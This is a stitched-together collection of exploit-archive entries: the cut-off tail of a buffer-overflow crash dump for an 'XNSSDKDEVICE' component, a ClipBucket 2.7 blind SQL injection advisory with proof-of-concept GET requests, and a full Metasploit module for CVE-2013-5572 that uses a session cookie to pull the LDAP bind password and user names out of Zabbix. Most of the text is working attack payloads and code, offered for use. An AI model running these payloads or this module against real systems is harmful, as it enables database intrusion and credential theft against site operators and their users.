mfc100.dll 2 647D0937 mfc100.dll 3 64E242CA VBSCRIPT.dll 4 77B3E0ED ntdll.dll Called From Returns To -------------------------------------------------- XNSSDKDEVICE.149434 41414141 41414141 414141 414141 3DA4C4 3DA4C4 mfc100.647790C1 mfc100.647790C1 56746C75 Registers: -------------------------------------------------- EIP 00149434 EAX 00003841 EBX 00609FB0 -> 0015A564 ECX 00003814 EDX 00414141 EDI 0000008F ESI 0000008F EBP 002BE5FC -> Asc: AAAAAAAAAAA ESP 002BE564 -> 0000000C Block Disassembly: -------------------------------------------------- 149423 XOR EDI,EDI 149425 XOR ESI,ESI 149427 MOV [EBP-8C],ECX 14942D TEST ECX,ECX 14942F JLE SHORT 00149496 149431 MOV EDX,[EBP+8] 149434 MOV AL,[ESI+EDX] <--- CRASH 149437 CMP AL,2F 149439 JNZ SHORT 00149489 14943B MOV ECX,EBX 14943D TEST ESI,ESI 14943F JNZ SHORT 0014944D 149441 PUSH 159F28 149446 CALL 0014F7C0 14944B JMP SHORT 00149476 ArgDump: -------------------------------------------------- EBP+8 00414141 EBP+12 003DA4C4 -> Asc: defaultV EBP+16 647790C1 -> EBE84589 EBP+20 FFFFFFFE EBP+24 646CBE5C -> CCCCCCC3 EBP+28 0000001C Stack Dump: -------------------------------------------------- 2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................] 2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] 2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................] -->

# Exploit Title : Clipbucket 2.7 RC3 0.9 Blind SQL Injection # Date : 20 February 2015 # Exploit Author : CWH Underground # Site : www.2600.in.th # Vendor Homepage : http://clip-bucket.com/ # Software Link : http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/clipbucket-2.7.0.4.v2929-rc3.zip # Version : 2.7.0.4.v2929-rc3 # Tested on : Window and Linux ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' #################### SOFTWARE DESCRIPTION #################### ClipBucket is an OpenSource Multimedia Management Script Provided Free to the Community.This script comes with all the bells & whistles required to start your own Video Sharing website like Youtube, Metacafe, Veoh, Hulu or any other top video distribution application in matter of minutes. ClipBucket is fastest growing script which was first started as Youtube Clone but now its advance features & enhancements makes it the most versatile, reliable & scalable media distribution platform with latest social networking features, while staying light on your pockets. Whether you are a small fan club or a big Multi Tier Network operator, Clipbucket will fulfill your video management needs. ################################## VULNERABILITY: Blind SQL Injection ################################## An attacker might execute arbitrary SQL commands on the database server with this vulnerability. User tainted data is used when creating the database query that will be executed on the database management system (DBMS). An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system depending on the query, DBMS and configuration. = POC = GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27a&type=photos&collection=9 => True Condition GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27b&type=photos&collection=9 => False Condition (Item does not exist.) ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################

## # This module requires Metasploit # Date: 25-09-2013 # Author: Pablo González # Vendor Homepage: Zabbix -> http://www.zabbix.com # Software Link: http://www.zabbix.com # Version: 2.0.5 # Tested On: Linux (Ubuntu, Suse, CentOS) # CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572 # More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572 # http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html # http://seclists.org/fulldisclosure/2013/Sep/151 # http://www.cvedetails.com/cve/CVE-2013-5572/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ldap_bind_password Zabbix CVE-2013-5572', 'Description' => %q{ Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code. }, 'License' => MSF_LICENSE, 'Author' => [ '@pablogonzalezpe, Pablo Gonzalez' ] )) register_options([ OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']), OptString.new('TARGETURI', [true, 'Path Zabbix Authentication','/zabbix/authentication.php']), OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5]) ], self.class) end def run req end def req resp = send_request_cgi( { 'host' => datastore['RHOST'], 'method' => 'POST', 'uri' => normalize_uri(target_uri.path.to_s), 'cookie' => "zbx_sessionid=#{datastore['zbx_session']}", 'content-type' => 'application/x-www-form-urlencoded' }, datastore['TIMEOUT']) ldap_host(resp) user_passDomain(resp) user_zabbix(resp) end def ldap_host(response) cut = response.body.split("ldap_host\" value=\"")[1] if cut != nil host = cut.split("\"")[0] print_good "LDAP Host => #{host}" end end def user_passDomain(response) cut = response.body.split("ldap_bind_dn\" value=\"")[1] if cut != nil user = cut.split("\"")[0] print_good "User Domain? => #{user}" end cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1] if cut != nil pass = cut.split("\"")[0] print_good "Password Domain? => #{pass}" end end def user_zabbix(response) cut = response.body.split("user\" value=\"")[1] if cut != nil user = cut.split("\"")[0] print_good "User Zabbix => #{user}" end end end